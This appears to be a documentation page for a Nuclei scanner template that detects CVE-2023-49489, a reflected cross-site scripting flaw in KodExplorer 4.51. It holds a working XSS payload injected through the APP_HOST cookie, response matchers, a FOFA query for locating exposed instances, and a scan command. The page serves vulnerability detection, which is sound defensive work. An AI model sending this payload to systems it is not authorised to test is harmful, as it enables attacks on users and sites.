KodeExplorer 4.51 - Reflective Cross Site Scripting (XSS)
ID: CVE-2023-49489
Severity: medium
Author: DhiyaneshDk
Tags: cve,cve2024,kodexplorer,xss
Description
Section titled “Description”Reflective Cross Site Scripting (XSS) vulnerability in KodExplorer version 4.51, allows attackers to obtain sensitive information and escalate privileges via the APP_HOST parameter at config/i18n/en/main.php.
YAML Source
Section titled “YAML Source”id: CVE-2023-49489
info: name: KodeExplorer 4.51 - Reflective Cross Site Scripting (XSS) author: DhiyaneshDk severity: medium description: | Reflective Cross Site Scripting (XSS) vulnerability in KodExplorer version 4.51, allows attackers to obtain sensitive information and escalate privileges via the APP_HOST parameter at config/i18n/en/main.php. reference: - https://github.com/kalcaddle/KodExplorer/issues/526 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-49489 cwe-id: CWE-79 epss-score: 0.00179 epss-percentile: 0.37213 cpe: cpe:2.3:a:kodcloud:kodexplorer:4.51:*:*:*:*:*:*:* metadata: vendor: kodcloud product: kodexplorer fofa-query: app="powered-by-kodexplorer" tags: cve,cve2024,kodexplorer,xss
http: - raw: - | GET /index.php?user/login HTTP/1.1 Host: {{Hostname}} Cookie: APP_HOST={{RootURL}}/"><ScRiPt%20>alert(document.domain)</ScRiPt>
matchers-condition: and matchers: - type: word part: body words: - "<ScRiPt >alert(document.domain)</ScRiPt>" - "KodExplorer" condition: and
- type: word part: header words: - "text/html"# digest: 4b0a00483046022100b32b8f021a9dbdaa4917d5feb132c5458d6761cfbd3616cf2a9f15ed2a062ae8022100d215fdf16b6b6aa5409f4e07e26285781a7f7079a4be64676cd2f317838dc27b:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-49489.yaml"